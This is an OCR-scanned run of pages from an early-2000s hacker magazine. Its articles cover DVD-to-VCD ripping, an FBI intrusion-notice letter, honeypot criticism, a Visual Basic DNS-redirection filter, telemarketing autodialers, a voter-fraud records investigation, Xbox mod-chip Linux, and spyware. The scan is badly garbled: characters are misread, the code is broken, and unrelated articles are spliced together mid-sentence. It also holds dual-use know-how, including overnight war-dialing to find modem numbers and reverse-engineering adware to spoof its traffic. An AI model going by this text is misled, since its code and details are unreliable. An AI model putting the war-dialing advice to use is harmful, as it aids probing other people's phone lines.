back to the DVD2AVI Mep and select a different audio stream from the audio menu until you get the one you want) For the Output file name, select where you want the MPG file to be saved. Now we need to set up the encoder Click the "Load" button next to the output file name box, and navigate to the "TMp- gEnc\Template" folder. From here we have the choice of loading a number of templates, but we re interested in only four: VideoCD (NTSC), VideoCD (NTSCFilm), SuperVideoCD ( NTSC), and SuperVideoCD (NTSCFilm), 8(V): VCD users check where you wrote down the "Video Type" from the end of step 6. If it was higher than 90 percent Film, load the "VideoCD (NTSCFilm)" template. If the video type was anything else, just load " Video- ed P( NTSC)", Now' click setting. Leave every- thing alone except for this setting: Under advanced, change the "Source Aspect Ratio" to what you wrote down front "Aspect Ratio 1 ' at the end of step 6. Now click OK to go back to the main window. You're ready to convert to MPG, Click "Start" in the top left corner and then get some sleep. It takes up to three hours on a 2ghz Athlon machine, probably much much longer for most of you. 8(S): Video CD users, use the instructions from step 8(V) - just load the SuperVideoCD templates. 9: Boy, that took a while. Now we have an mpg file of the complete movie. Check it for quality, audio synch, and general not-being- serewed-up. When you're satisfied shat the tile is complete, it is safe to delete all the other files that you used for this project. Now the tile should be roughly a gig for a no rmal length movie. We need to split il up. Stay in TMpgEne. Remember when I mentioned the cool MPEG f ools? We're going to use one of them now. Go to file-IMpcgTools. Click Lhe "Simple De-Mul- tiplex’ 1 tab. Load the mpg file of the movie into the "Input” file box, and the other two should be automatically filled in for you. Click the start button. It will rip the MPG file into a *.m 1 v and a *.mp2 lile. These we need to load into BBM- peg. Go lo the BBMpeg folder and run "AVI2MPG2". It looks very confusing when it loads, but don't fret. Take a look around again. What we need to do is simply click the "Start Encoding" button, ignoring the very confusing initial interface. Click the Settings button. We need to set something on three out of the four tabs you now have access to. On the "General Settings" tab, set the "Max Size(MB)" to a num- ber equal to roughly half Lhe filesize of the file you have, but don't go higher Lhan I OMR less than the size of your CD you will burn it to. 1 like to keep mine set to 640MB, it seems like a pretty standard size. On the "Input and Output Files" tab, we need to set three things. The "Pro- gram Stream File" is the name of the output file you want. Your half-movies will be called f file- name fOI. mpg and { filename |02 mpg. Now (br the "Video Stream File" and "Audio Stream File", use the *.mlv and *.mp2 files we just cre- ated, respectively. The last tab is the "Program Stream Settings". Simply choose "VCD' or "SVCD" from lhe radio buttons. The fourth tab allows you to save your settings for this pro- gram, Do so if you are going to be using it a lot. Click OK to get back to the "Start Encoding" screen, then click Start", This shouldn’t lake very long, 10: Now we have two (or sometimes three) files that are small enough to fit on CDs. Load up Nero, In the "Create CD" dialog, ruCTO should have options for both VCD and SVCD. Select whichever applies. Under the ISO tab, select 'ISO Level 2" for the filename length, and "ISO 9660" as the character set. Also check all the boxes under "Relax ISO Restrictions". Now we are ready to burn. Click "New" and it will take you to a normal CD creation screen, except the CD window has both a directory structure and a file list box in it. Drag your file to the white box under the directory tree, not into the tree itself even if you know where it goes. Nero will check the file. It it complains, just ignore it. Et should still work. Now bum... and you will have your- self a fresh VCD or SVCD. Repeat this step for the rest of the disks needed to get the full movie, 1l(V): Playing VCDs on computers: You can use a software VCD player, or just go into the CD and open "AVESQ0I.dat" in the "MFE- GAV" folder with your favorite media player. Page 13 Winter 2002-2003 11(S): Playing SVDS needs a compatible DVD software player or an MPHG2 codec for your Medial Player. Personally, I use ATI’s me- dia center, or Power DVD. 1 2: Enjoy! Props to KalLI - I learned how to rip DVDs using his site. Also, check out after- dawn .com - there are some good things on there. I would also like to ask Wilson to read this article aloud to the class like he always does. Thanks. Links till tp jf w w w, all e rdaw n .c om/so ft w a re/vi dco_sot i ware/d vd_r i ppers/sma rt ri ppe r.e fin h up ://w w w a herd aw n . co m/so ft w are/v i dco_so ft wa re/d vd_ri ppers/d vd 2a vi, dm h itp ://www + afterdaw n .com/st > ft wore/v i deo_s< > ft ware/v ideo_ too I s/tmpgenc. c f m h up ://me tube rs, cox . net/beye le r/hbmpeg. him 1 http://www,adaptec, com/world wi de/support/dr 1 ■ ve rdet ai L him I ?Cflt=/Pr< kIucI/ A S PI - 4,70&fi lekey=saspi _v470.exe UJS, Department of Justice Federal Bureau of Investigation In Reply. PfcUic Refer tu File Nu he NASA Office of Inspector General and the FBI are conducting a joint investigation into unauthorized computer intrusions that have affected both the government and private industry. During the course of this investigation, we discovered a log file listing Internet Protocol addresses and server names, it appears to be a list of computers that were compromised. In order to notify the potential victims of ibis criminal activity and enable them to check their own systems, we have compared the log of IP addresses and server names against the most recent information available in the WHOIS database. This letter is being sent to you because the IP address or sewer shown below, and last registered to you, appeared on the log file of apparent victims. We have no indication that the intrusions associated with this activity are continuing. We also are unaware of the hacker's methodology against your system, the potential level of access, or the possible damage to your system. The time frame of the activity to which the log file relates occurred between December 2001 and March 2002, with the majority of the activity occurring in mid -February 2002, This communication is being provided to you by the Watch and Warning Unit of the National Infrastructure Protection Center (NIPC), located at FBI Headquarters in Washington, D.C. In addition to the recommendation that you check your log files for indications of unlawful activity and lake appropriate mitigation action, NASA and the FBI request that you provide any information relating to this matter to the NIPC by e-maiting the W T atch at ni pc, ware fra 1 : fhi.gov. For recommendations about examining your systems in a manner dial helps preserve die evidentiary value of information you discover, please refer to the NIPC website at www . n ipc . go v/incid ent/ i nc i d ent2 . h t m . System (s) Information i he kicker of this is that both the contact and domains referenced had nothing to do with us and we were apparently sem this letter in error. Yet more wasted time and re st >u ree s . he Wa t e h a nd Warn i n g Unit ? ! ) Page 14 2600 Magazine they would not under normal circumstances en- gage in. It's going to be next to impossible for poor xy63r ninja to use an entrapment defense in court, because by the time po po shows up. it will be obvious he was lame-assing around of his ow n accord. However, if a crafty admin goes on IRC and tells everyone that his honeypot is actually the fabled government computer that holds the truth about the Kennedy assassination, Area 5 1 , and ancient methods of dolphin flog- ging and people hack him. then an entrapment defense would stand a chance. The reason is that the admin could never prove that xy63r ninja and his crew were going to hack his sys- tem without being enticed. Other critics say that honey pots are akin to electronic wiretapping. This 1 can agree with. Since there is not much legal regulation of honeypot technology, and the closest legal procedures are loose at best, some very scary things could happen. Other companies could expand the basic thrust of the technology, perhaps into the p2p networks. At lhat point it would be us, the hacker community, that stands up and tells the world thaL Lhis is a gross invasion of privacy. Then, pretty much just like the MPAA did to ns, all they would conceivably have to say is: ' Con- sider the source, your honor. Hackers want this technology stopped. Hackers are criminals. Yon don't want to side w r ith criminals, do you? We are here to protect the American people from hackers, and wc need you to he brave and give us the power lo shut these nasty people down." Then in all likelihood, the corporations would roll right over us again. I don't think it takes a major leap of logic to see that this is where hon- ey pot technology, or more specifically, technol- ogy that clearly violates people's rights under the guise of protection, could be headed. Also, I don’t trust the "good guys" any farther than I can throw them. We need to put a handle on the situation before the "security community" gets any ideas on how to further expand their powers past our rights on the backs of the hacker community they demon i/.e lo get their way. Why Hon e y pots A re Not Practical For Everyone The good news is that honey pots arc not a true "solution,” The best application for a hon- cypoi is to track an intruder who has already made a home in ihe system. The most notewor- by Bland Inquisitor bland _iuquisitor@hotiDuil.c0tn Honey pots are usually programs lhal emu- late services on a designated port, but once suc- cessfully cracked, offer no real power to the altacker. The honeypot program will then alert ihe admin that an attack is in progress, and will allow the admin lo Lrack the attacker’s every move. Honey pots will also show the methods the attacker is using to gain entry, and what methods are being used to cover his or her tracks. In this article, 1 will show how honey- pots work, why honeypots are not generally practical for most security situations, and how honey pots are breeding both smarter attackers and dumber admins. How Honey pots Work Honeypots are designed to operate on many levels. They increase the time an attacker will spend because the honeypot makes it unclear which attacks work and which ones don't. They let the admin know what method an attacker is using before they succeed - such as port scan- ning, bruie forcing a password, or a Send mail attack. Once honeypots are widely imple- mented, the attacker will be forced to spend more time in a system that may be closely watched, and will eventually be scared off. Also, once xy63r ninja the script kiddie stops going anywhere near the system, admins can fo- cus all their attention on fending off people w ith actual skill. In one of the honeypot advertisements I read, port 365 was being used as the honeypot porL, This means that a scan that returns port 365 as active will make the would-be attacker turn and run off and sltal systems lhal are not running the honeypot can use port 365 as a blulT. so that when xy36r ninja the script kiddie sees it and the system looks sexy, he will be less inclined to go in because he thinks that the vul- nerabilities he sees are a deception. According to SecTech systems administrator Dan Adams, honeypots are "like opening a fake store, load- ing i( with cool stuff, and sitting back hoping someone will break into ii." Honeypots are catching a lot of pretty seri- ous heal from ihe legal and ethical community. Some critics are calling honey pots entrapment. Let me clear this up for you. Entrapment occurs w hen a person is coerced to commit a crime that Page 15 Winter 2002-2003 thy case of this happening was documented by Clifford Stoll in his book The Cuckoo's Egg. Stoll was an admin at Berkeley when he found an intruder using his system to steal secrets. But only an admin who has been around the block a few times and watches his system often can make full use of honey pots. Apart from that, over 90 percent of attacks against a system come from inside, and there is nothing a honey- pot can do to stop someone who has internal ac- cess from running amok For the average company, the extent of a honeypofs effective- ness is to keep xy63r ninja and the rest of die script kiddies away, and to show that (here is a real threat of people breaking into the system. It is almost unheard of that a honey pot traps someone with real skill because it is designed to keep the kiddies at bay. In the digital arms race, tightening the exist- ing Security holes will only force the attackers to get better while the admins get complacent. Most admins are only slightly better than good ole xy63r ninja in the first place - they get the latest and greatest piece of ready-made software and call themselves experts. What is bound i" happen in the majority of the situations is that a company sets up a houevpol and never bothers to spend the time it takes to maximize its effec live ness. Of course, the true answer is lor ad mins and software programmers to actually take a little pride in their work and do their jobs properly. Also, h would help if software compa- nies would take some responsibility when they find security holes in their product and update accordingly. System admins should also feci obligated to keep their software current, and make sure nobody within their company is given more access than they need. Shout outs: stankdawg , grifter, dehug. pro- jeci honey net. And an apology if anybody actu- ally uses the name xy63r ninja. Redirection stopped by cMd_bOM The letter from "bradsnef in 1 9; 3 uboul how Ford could redirect back to 2600.com or 127.0.0. \ etc. got me thinking about how easy that could be. It turned out to be easier than ! thought. Every http request has a host field in it that contains the address that was typed in. so if I type in www.2600.conT and click "Go'* it will have www.2600.com in the host held. All browsers that l know of send the host field in their http request. If DNS redirects a site, the host field will not change when redirected and so we can detect it with little effort. Example of a HI TP request (notice the host field): GET/ HTTP/1.1 Accept: +/* Accept -Language: emus Accept-Encoding: gzip. deflate User- Agent: Mozilla/4.0 ( compatible; MS IE 5.0; Windows 98: DigExt) Host: www.2600.com Connection: Keep-Alive Included is a small VB program (I used VB to show how easy it is) that scans all incoming hup requests and checks to see if the host field is the web address or the IP address of the current web- site. If not, it redirects to 2600.com, and if so it redirects to Ford's website. This doesn't protect from meta tag redirection, or (I)FRAME redirection which needs a webpage to do the redirecting, ratlin than a DNS entry. Here is a script that can stop that (real simple - it look live minutes’). Hey, a 16 year old can do it, so can a big corp. OK, here is the DNS Redirection filter made in VB. Note: If you are going to set this filter up you'll have to change your server port to something other than HO and change the meta headers to redirect to that port (big deal, unless you're running IIS). You could add this feature to an open source web server, too. You could alter the code to redirect to the port directly. Step 1. Create a project wiLh "Standard EXE M . Step 2. Add a Win sock component and name it Win sock 1 (dial's the default). Step 3. Change the properties of W insock 1 s Index tab to 0. Step 4. Make a form and name it Form I (default again). Step 5. Put the code below in the form. ‘DNS Redirection filter 'by cO!d_b(X)i 'for Fored(Iol) and NPR Private we bad dress As String Private web ip As String Private intlastcontrol As I .one Private Sub Form_Load() we bad dress = LCa$e(Winsoek 1(0). Local HosiName) webip = Win sock 1(0). Local IP intlastcontrol = 0 With Winsockl(O) .LocalPort = 80 .Listen End With End Sub Private Sub Winsock I _Connect ion Request ( Index As Integer, ByVal request id As Long) If Index = OThen intlastcontrol = intlastcontrol + l Load W i n sou k l ( i m 1 as Icon t ro l ) Winsock I (intlastcontrol). LocalPort = 0 W i n soc k 1 ( inti as tcont rol ) .A ccep t req ue st id End If End Sub Private Sub Winsock l_DataArrival( Index As Integer, ByVal bytesTotal As Long) Dim data I As String Winsock 1 (intlastcontrol ). Get Data datal On Error GoTo redirect normal al — InStril, datal, ‘Host: ") + 6 a2 - InS tr(aL data I . vbC rLf) a3 = LCase(Mid( datal, al, a2 - al)) If a3 = webaddress Or a3 - webip Then Winter 2002-2003 Page 1 7 GoTo redirectnonnal Else ' D N S red ireclion de tecte d red i rec ting bac k t o 2600. com Wmsockl(mUastcontrol).SendData "" 'meta tags here End If Exit Sub here we do a normal redirection to ford.com redirect normal: Winsock l (intlastcontrol ).SendData ,r " meta tags here End Sub Private Sub Win sock I _SendCfomplete (Index As Integer} Winsock I (intlastcontrol). Close End Sub Step 6: Compile and run. Shoutouts: Hi Mom, Bryan, Cassidy t my bro (Nathaniel), and whoever I forgot. More on Tel ©market i rig by D» Foetus In response to the number of letters re- ceived regarding the TcleZapper and similar systems that will Vap" vour phone number from a telemarketing system's database* here is some more insight. Many larger telemarketing, market re search, and bill collection companies use auto- dialers coupled with CAT I (Computer Aided Telephone Interviewing) software systems. It is the job of the autodialer to dial, say. ten phone numbers for every human agent that is currently seated in their calling center, know- ing that one out of every ten phone calls will be answered. The number of calls made by the auto-dialer can be, and usually is, automati- cally adjusted depending on how that 10:1 ra- tio performs. For example, if the sample being dialed consists of phone numbers culled from product registration cards, the number of an- swered calls may be higher than if the machine is running RDD {Random Digit Dialing) in valid area codes and exchanges, minus already known phone numbers - basically war dialing lor unlisted phone numbers. If you ever get a phone call that shows up on your Caller ID as being from, say, X YZ Re- search, and it hangs up immediately after you answer, you've received a 'nuisance call." This happens when the autodialer has made more calls than there arc available humans to patch you to. Your phone number is now tiagged and will receive special treatment - the system knows you arc home and answering the phone, but it also knows it just hung up on you. You will now get another call from XYZ Research in about 15 minutes (the amount of time lapsed is set by the user system-wide], but this time their system will reserve a human before call ing you, ensuring that they get to talk to you. The autodialing system will eventual Is have dialed through the entire pool of sampf and it will have pretty much determined whit h phone numbers are good and which are not. lr 2600 Magazine can distinguish between non- working numbers (those that answer with the familiar tri-tone followed by a recording of some sort), those that do not ring at all those that are busy, those that arc good (no answer, etc.), and those that are fax/modem/machine numbers. Each phone number has a status code assigned to it and any bad numbers are resolved never to be called again. Aside: Interesting point here is that all the fax/mode nV machine numbers will have re- ceived a unique status code marking them as such - basically there now exists a pool of phone numbers that have a very high likeli- hood of being modem numbers. Just as easy would he to set up a project that runs automat- ically overnight, dialing strictly 202-xxx-xxxx numbers (if you wanted to find machine num- bers in the DC area), and have your CATI soft- ware just hang up on all good numbers. Look at your "bad: modem number" list in the morn- ing and you've got an excellent start on your fun for the days to come. If one has the desire, and access lo a larger system, one could easily burn through tens of thousands of phone numbers in a single night. But back to the TeleZapper vs. auto- dialers and other devices. For them to work, your phone must actually go off hook and transmit the tone(s). If an auto dialer calls your number and your voice mail picks up, the call is imme- diately transferred to an available agent, who will mark your phone number as known good, but you're not home (answering machine/ voice mail answered). I'm sure you're already ahead of me here, but, the obvious step to take is to record the "bad number" tone(s) as the first part of your outgoing message. Sure, it will an- noy the hell out of your friends and family, but it will kill your phone number in that sample pool if it's being dialed by an intuitive auto-dialer. Note that I say that sample pool. Your phone number may exist in myriad sample pools at different companies. One way to dra- matically cut down on telemarketing calls (and market research calls, if you're so inclined, though they arc two very different entities with two very different agendas), is to first register the phone number with the DMA (Direct Mar- keting Association) as warning to opt-out of telemarketing calls. Also, explain to any com- pany you do not wish to hear from that you wish for your phone number to be placed on Winter 2002-2003 their "do not call" list. The DMA also allows one to register their mailing address as well as email address as opt-outs to cut down on junk mail and, allegedly, spam email. Not all com- panies check their sample against the DMAs opt-out list, and not all maintain a M do not call" list, but any company that wishes to do busi- ness in an above -the- board manner will heed your request. Telemarketing companies can he somewhat sketchier than market research com- panies - any market research company that wants to stay in business and make money will follow the guidelines for standards and ethics set forth by the MRA (Marketing Research As- sociation), CASRO (Council of American Sur- vey Research Organizations), and other organizations. A client will likely not do busi- ness with a market research company that does not belong to these organizations. It does take a while for your opted-out phone number/address/email address to trickle down and through the giganric system that is comprised of sample houses (those that pro- vide the phone numbers, street addresses, and e-mail addresses), and to the thousands of end- users ( telemarketers and research companies), but it does work, A perfect time to do this is when moving and getting a new phone num- ber, but ii will have an eventual effect if you're staying pul as well. Another option is to sign up for your local telco's "security screening" plan, if available. This will require any caller who is blocking their Caller ID info to input their phone num- ber, or the call will not be connected. One drawback is that some long distance compa- nies relay calls around the country to the clos- est low -traffic switching point and the Culler ID info is stripped in the process, requiring Grandma to input her phone number each time she tries to call you, since she's on a lixed in- come and using Jimbo's Phone Company lo make cheap long distance calls. No one will ever be totally free from re- ceiving unwanted phone calls, but there arc ways to dramatically reduce them. As many ways that there are of keeping our phone num- bers in the hands of Lhose we want calling us, there are ways of getting around whatever we put in place to try to ensure this. Surely some- what ironic to those reading this magazine,... Page 18 r Page 19 Cracking VOTER Fraud by Kr@kH3d (DFxC) f Why the goofy "teei" name / Overkill is funny...) Some New York 2600 readers may have seen ihe recent three minute report on WABC's Eyewit- ness News (10/25/02) on the discovery of sus- pected fraudulent voters in New Brunswick, NJ. Since I ve been a longtime 2600 fan and played a major part in the investigation, I figured I'd outline how we did it. After speaking with the people at the local Board of Elections and realizing how easy it is to commit voter fraud, I also fell it may be of use to others in general Oh, and if you saw the report, there's a brief shot of my back while I'm at the computer wearing an H2K shirt! The technique outlined here was developed by Lhe New Brunswick United (http://www.new- bmnswiekunited.com) Antifraud Division, headed by attorney Flavio L, Komuves. I was lead investi- gator in charge of isolating possible cases of voter fraud, and was ably assisted hy a number of Rut- gers University student interns, 1 should preface this with the disclaimer that the resources and procedures i am outlining are legally available in New Jersey, and there is no need to obtain any information illegally. Check with your local authorities for your area. Also, a new law regarding voting was recently signed and certain new provisions will take effect in the 2006 elections. Always lake any information you gather to a reputable lawyer and gel advice before releas- ing it publicly - voter fraud is a serious charge and falsely accusing someone (even unintentionally) could probably result in charges against you! Also keep in mind, any information we determined via this method of database searching was later veri- fied by actual held visits to the properties in ques- tion. It's actually rather similar to profiting a system. The first step is to gather all the information possi- ble about your target. Your first stop should be your county Board of Elections. You will have to fill out certain forms - being part of a political or- ganization helps out here, as they reserve the right to ask why you are requesting the information. There are two databases they maintain thai you will need to request on CD-ROM: the current Ac- tive Voter Registration database ("walking list") and the current Actual Voter Database ( "voting his- tory"). There will probahly be a fee involved - ex- cessive fees for preparation and other "costs" is yet another way the government restricts your access to information (while insisting on greater access to your information). I believe it should come to ap- proximately $60 for both CD-ROMs and li may take a week or so for them to prepare. The second stop is your local Municipal Clerk's office. Here you request a listing of all paid city employees [ Municipal Employee List" ). specifying the following information: salar whether or not he or she is a city resident, years o I service, job title, and of course name. They must release this information to any city resident as ii is considered public information (your tax money pays Eheir salary). Again, they may charge you tor costs. In our instance, Ihe City Clerk's office tried ! browing us off by refusing to provide us with a CD-ROM version, and instead provided us with a printout of the database. Luckily, volunteers cre- ated an Access database and entered the informa tion into it within a day or so. You may also request a listing of all rental properties [and landlord own ers) from your city's Rent -Leveling Board or simitar body. OK t so now you have your base documents. You've gathered your information. Now to poke for weaknesses. What next? Well, first look at IT Active Voter Registration and sort it by birthday Any 172 year olds still registered? Probably not. il so, cheek their names on the Actual Voter Dai a base. In our investigation, we immediately noticed an enormous number of people horn on 01/01/1901. According to the Board of Elections this is their standard procedure for dealing with il legible entries and/or people who registered to vote before New Jersey required b nth date to he added to the Voter Registration form. Sorry, strike two. Next, run a query to isolate everyone from like age 99 and up. If you feel there's an overabun- dance. check the names against the Social Security Death Index on http://www.ancestry.com. Don'i gel too excited if you find matches though - Amcr icans have the funny habit of naming their kids af ter themselves. Go to hdp://nhvw.netronliue .com/pub I ic_records.htm ( Property 1 a x Reeor \ Is and make sure it isn't their son or grandson tin one instance we originally thought for sure was voter fraud, there was a son named alter his father, w ho inherited the house his parents had lived in, and then married a woman with the same first name as his mother - creepy!). Be thorough, but don't waste too much time on this - we had a team spend over a month on this and turn up only a handful of "pi > si hies. It might also be helpful to have some working with you who has access to credit card hi siories/databaxes , but I'm not sure if that is legal or how useful it would be in this instance. That takes care of the infamous 'dead vote The next "weakness” to probe is the Mumapnl Employee List, Hopefully, you know yom u ■ ■ i 2600 Magazine pretty well, because how effective your work here will be will he in direct proportion to how well you know your town. The first test is to query all non- city resident employees and run their names on both the Active Voter Registration and Actual Voter databases. Note down any instances, but keep in mind that ihe individual may have lived in your town ni otic time, and showing up on the Ac- tive Registration Database isn't a crime in and of itself - voting I i.e., being on the Actual Voter Data- base) is. Follow this up by running a query with all employees making over, say, $65,000 a year. Run their names on both the voter databases and pay al- lent ion to what their registration address is. You may discover some rather well-off individuals liv- ing in really shady neighborhoods. In our investi- gation, we caught the city's Chief of Operations for Urban Renewal voting out of the same run-down apartment in an impoverished high-crime area as a small immigrant family. On investigation of the Property Tax Records, we discovered he lived in a nice home a few towns away! Most of our results came from dfis method. Requirements: A mod-chip. Ed's xbox linux (Debian derail ve) found at: 1 1 1 1 p ://sourc e forge . n e t/proj ect/sho wfiles, p h p ?gr uupjd=54l92, BIOS for mod-chip that allows Xbox to run unsigned code. E volu ti on X d ashb< »ard , As some might have noticed, there has been several strides made in Lhe attempt to pul Linux on any device in which it would he logically beneficial to the computer/hacker community. Winter 2002-2003 If you managed to gel a copy of the landlord tislings, be sure to check all those names thor- oughly as well. A common form of voter fraud is for landlords to register at a property they are rent- ing out. A good portion of our leads were also gen- erated this way by checking landlords we knew had broken the rent-control laws. The last method we used lhai had results was 10 start running names of business owners who oper- ated in town. Much like the landlords, some un- scrupulous business owners will register to vote at their place of business. Wet! , that's basically it in a nutshell. Hopefully, this short article was informative and useful, as well as a contribution showing that 2600 readers are often more concerned about protecting and maintaining the democratic process than the politi- cians who scapegoat us as evil hackers. For ques- tions or comments, email domi nick® rami ustech .com with "2600 1 ' in the subject line. or just for the challenge of iu The Xbox is no exception. Jt is now possible to pul a full Linux distribution on the Xbox console, due to the work of some very diligent Linux/Xbox hack- ers. I will cover the steps to go about installing Linux on your Xbox console and Lhe significance of such an installation. There are multiple reasons one might want to go about installing Linux on an Xbox. For one, it would serve as a very inexpensive desk- top computer. Being Lhai you can now find Xboxes selling at prices of $ 1 7G-S20Q, this is understandably worthwhile. The Xbox is also hy Live_wire Page 20 Page 2 / feature-rich, it is a gaming console, DVD player, and now with the inclusion of Linux, can be your desktop computer, DivX player, and web/ftp server. Perhaps you would use it just to run nominal functions, saving your main com- puter the stress. This is just the beginning, though. The possibilities are, obviously, limitless. This brings us to the actual installation. You will need a modified Xbox to consider such a setup. However* this is not as scary as it may sound to Lhose who might not have soldering experience. Gone are the days in which you would have lo solder 29 wires to the Xbox motherboard. You can now buy wireless mod- chips which require no soldering at all. There is a chip out now called the Matrix (by Xodus) that is wire free and can he installed in a matter of minutes. There are also other chips in devel- opment that will be wireless also, so then it would be just a matter of personal preference as to which you would choose. T have chosen to go with the Matrix chip because it has no wires to solder, comes with a programmer, and, as far as l have seen, is Lhe easiest to install, I must men- tion also, if you don 1 ! want Lo fork out $60, you can make your own. CheapLPC designed by Andy Green, can be constructed for a few bucks. Visit http://warmcat.com/iiiilksop/in- dex.html. So this is where we start. You have your mod-chip of choice. You also downloaded the -iso image of the Xbox Linux distribution lo- cated at the sourceforge site mentioned at the beginning of the article. You will need to flash your mod chip with a BIOS lhal will support running unsigned code on the Xbox. These BIOSes can be readily found on the Internet with a little due diligence. I mentioned that the Matrix mod-chip comes with a programmer. You can plug that programmer into the parallel port on your computer and dash the Matrix with BIOS software that way. You can get the flash- ing software from http://warmcat.com/milk- sop/ index.htm I (Xodus will release their own GNU software shortly). I have chosen to go with the EvolutionX 2,5 BIOS because it sup- ports all the features one would want, such as running unsigned code, among others* Next* you will have to download the EvolutionX dashboard, which will replace the original Xbox dashboard, and will act as your new interface with ihe Xbox and burn it to a CD-RW (X boxes do not like CD-Rs). i his can also be found on lhe net with a little patience* 4. Hack a way to circumvent the spyware or adware software and most importantly post these You will then need to open your Xbox and physically install rhe mod-chip. After that, you will want to install the EvolutionX dasbboan ill at you downloaded and burned to CD. You will now have a pretty new interface that hm many features, such as backing up games (that you bought) and whatnot. Once this is insta \ you will then he able to install your downloaded Linux distro. You might he thinking, how do 1 work win Linux when all 1 have is an Xbox controller? Well* as you might know, the controller ports on the Xbox console are really just usb ports* with a little modification. You can get ahold of an Xbox controller extension, cut it in half leaving the end that plugs into the Xbox intact, and look at the wires. You will see a red, green* blue, white, and yellow wire* the same as a standard usb cable minus the yellow one* You can then cut a usb cable, leaving the usb A end intact which connects to your usb keyboard/mouse. Solder the matching wires together and leave the yellow Xbox wire by itself. Do this two limes and you now have a keyboard and mouse that you can plug into the Xbox and use with Linux, assuming I mux supports the ones you chose (make sure it does). There you have it A Li mix /Xbox that can now be used as you wish it to be* and the best part about ti is that it is legal. The developers that have been working hard on this Linux pro- ject are not building this software on top of the Microsoft kernel - they are using the Linux ker- nel. They are also not using non -licensed soft ware like the XDK, which is Microsoft's development kit lor the Xbox. The reverse engi nee ring that has been done has been done under Sec t ion 1201 ( I ) Rev erse Eng i nee ri n g Ex ce p- tion for interoperability of the DMCA. 1 am indebted to the Linux developers of xbox- fi nux, so urce forge . net* the Xodus team Xboxhacker.net {and its forum), Andy Green, and several other sites/i ndi v i duals/hac k ers that have made this article possible. 1 will cover the more technical aspects of Xbox hacking in a l u lure article, but 1 hope 1 have given enough in formation so dial you might get a start with hacking Linux onto the Xbox, and team in rli« process. 2600 Magazine by 0A/3_ 3>3d_MU/VsLV ha x or 260(1 @ ma ikity.com This short article is far too small to encompass this topic but hopefully it will focus more atten- tion on the increasing problems of removing spy- ware and adware. Any hacker running a Window s operating system is going to come across some spyware or adware at some point. Popular lile sharing P2P software are typically one of the most common areas where adware is installed* An example of this would be Kazan P2P, which by default installs cydoor (cydoor.com). Spyware and adware are often hidden deep in Lhe Software Licensing documents and Terms And Conditions when you install the software* This can result in such things as your day-to-day activities being broadcast to strangers or annoy- ing ads being projected in your face every few minutes. To make it more confusing adware isn't neces- sarily spyware. Registered shareware without ads may he spyware, and purchased out of-the-box software may contain adware and may also he spyware* In addition* software updates may change a previously ad -free version into an ad- ware product. All this means that users need lo he on guard w hen installing any type of software. While legitimate adware companies veil] dis- close the nature of data that is collected and trans- mitted in their privacy statement, there is almost no way for Lhe user to actually control what data is being sent. The fact is thaL (he technology is in theory capable of sending much more than just banner statistics - and this is why people (espe- cially computer hackers) should feel uncomfort- able with lhe idea. To top it off* if you have a slow computer or Internet connection the resource hogging adware or spyware can cause system and browser insta- bility and slowness, as well as slow Internet connectivity even more. How Do You Protect Yourself? ] . Read the terms and conditions of the license carefully before pressing "accept.’ 2. Run a spyware or adware removal software tool, i here are many free versions available. 3. Avoid spyware at all costs. Run a firewall utility like Zone Alarm (zonelabs.com) that spec- ifies which programs can access the Internet and how. Pay attention to what is asking for permis- sion to connect online. Winter 2002-2003 to a hacker message hoard or to a hacking website. 5* Avoid adware. If you're broke and can't buy a clean shareware product, find uu ad -free, non- spyi ng equivalent of the program you need. This can be hard since many popular programs come only with adware installed* 6. Learn to use a packet sniffer to identify transmissions (hat sneak through your browser and other trusted apps* 7. Get to know your registry really well espe- cially the H K E Y _LOC A L_M A C H 1 N E\S O FT- WARE* H KE Y_C LFRRENT_U SERVSoftware * and for Win2k HKEY. IJSERS\ areas. If you no- tice software installed that you are suspicious of* check to make sure it's not spyware or adware* 8. Manage your startup programs carefully. Check the registry or use '’msconlig" or a similar startup manager or alternatively download and in- stall a free task manager to check and kill running sp y w are/adwar e . 9. And finally, you can also reverse engineer die adware software and find a way to corrupi the data being transmitted. Alternatively develop your own program to transmit dummy data lo the adware /spy ware host servers. If you do achieve this* post ihe results to a hacker message board or to a hacking website. Some good ad removal programs are: Opl-out {grc.com/optout.hlm) and Ad- Aware (lavasoft- usaxom). Also, visit the following websites: scumware.com, security.knlla.de. and spyware - into.com. In summary* spyware and adware are not ille- gal types of software in any way. However there is almost no way for (he user to actually control what data is being sent. My guess is that a deliv- ery system like the ones used by spyware and ad- ware corporations would be the most efficient way for governments to spy on the public. They probably have already thought of using this sys- tem so hackers hew are . Sho u is to VISA _hu rg la r»G reg_Ipp, Jalaiudinjtumi, _SfR _B U _D_, Scrappy. Page 22 Page 23 Page: 1 Billing Parted Ending; &Z3/02 Statement Date: Qi 24/02 Customer dumber Summary of CAurgea Here's our August Sprint bill - a little higher than usual, but otherwise normal. Submitted To Your Znritt Card Total Uhpdtd Charges Taxes anU R&pul alary tel Chary-e Bainni:Fne right and left side of the tape when held under ul- $low a process and causes too many errors in the traviolct light; (2) On the rear of the receipt, there identification of coins. Rattier a complicated is a small box with nothing in it. If a coin is rubbed process involving electromagnetic identification is across the box. the Coinstar logo appears, used. Coinstar currently holds U.5, Patent Number However, far more interesting than the actual 6,196,371 for the device and the abstract of the machine is the Coinstar network. Each machine patent provides a good explanation of how it contains a modem and a phone. Each machine di- works: als the Coinstar headquarters every night and Coins, preferably after cleaning, e.g. using a downloads the day's usage statistics. These include trommel, are singula ted by a coin pickup assembly the number of coins counted, what types of coins configured to reduce jamming. A coin rail assists in were counted, the number of transactions, the av- providing separation between coins as they travel erage dollar amount per transaction, and the reject past a sensor. The sensor provides an oscillating percentage (used in determining if a machine is re- electromagnetic field generated on a single sensing jeering an excessive amount of coins, which is core. The oscillating electromagnetic field is com- cause for a technician to be sent out U> examine it), posed of one or more frequency components. The A normal reject percentage is around one percent, electromagnetic field interacts with a coin, and however slightly higher percentages may be siin- these interactions are monitored and used to ela_s- ply due to people inserting all kinds of foreign sify the coin according to its physical properties. matter into the machines. All frequency components of the magnetic field In addition, the machine analyzes the last are phase-locked to a common reference fre- week's worth of usage statistics, and estimates the queney. The phase relationships between the van- day it will be full. An armored car will then be ous frequencies are fixed. and the interaction of scheduled to empty the machine on that day, or each frequency component with the coin can be possibly earlier. The machines also contain diag- accurateiy determined without the need for com- nostic software that will automatically page a lech- plicated electrical filters. In one embodiment, a ni dan if a problem occurs, sensor having a core, preferably ferrite, which is Occasionally, Coinstar sends software updates Page 25 Winter 2002-2003 to the machines to lix bugs, add features, and ad- vertise promotions. These updates are also down- loaded to the machines during this time period. All of these statistics are stored on servers at Coinstar's headquarters in Bellevue. Washington, and many 